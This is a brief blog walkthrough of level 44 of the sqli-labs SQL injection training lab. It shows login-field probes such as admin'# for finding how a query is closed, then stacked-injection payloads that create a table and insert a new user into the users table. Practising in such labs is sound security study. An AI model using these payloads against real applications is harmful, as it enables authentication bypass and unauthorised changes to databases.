sqli-labs (less-44)

sqli-labs (less-44)

Entering level 44, I found that it is still this page.

Enter admin'

here and find no error echoes, so we can only guess

admin# #登入失败
admin'# #登入成功


So it is judged that the closing method is'#, and the character type is injected

Here we directly use stack injection

Create a table

a';create table test like users;#


Create a new user

a';insert into users values(18,'icepeak','icepeak');#

Guess you like

Origin blog.csdn.net/kukudeshuo/article/details/114791801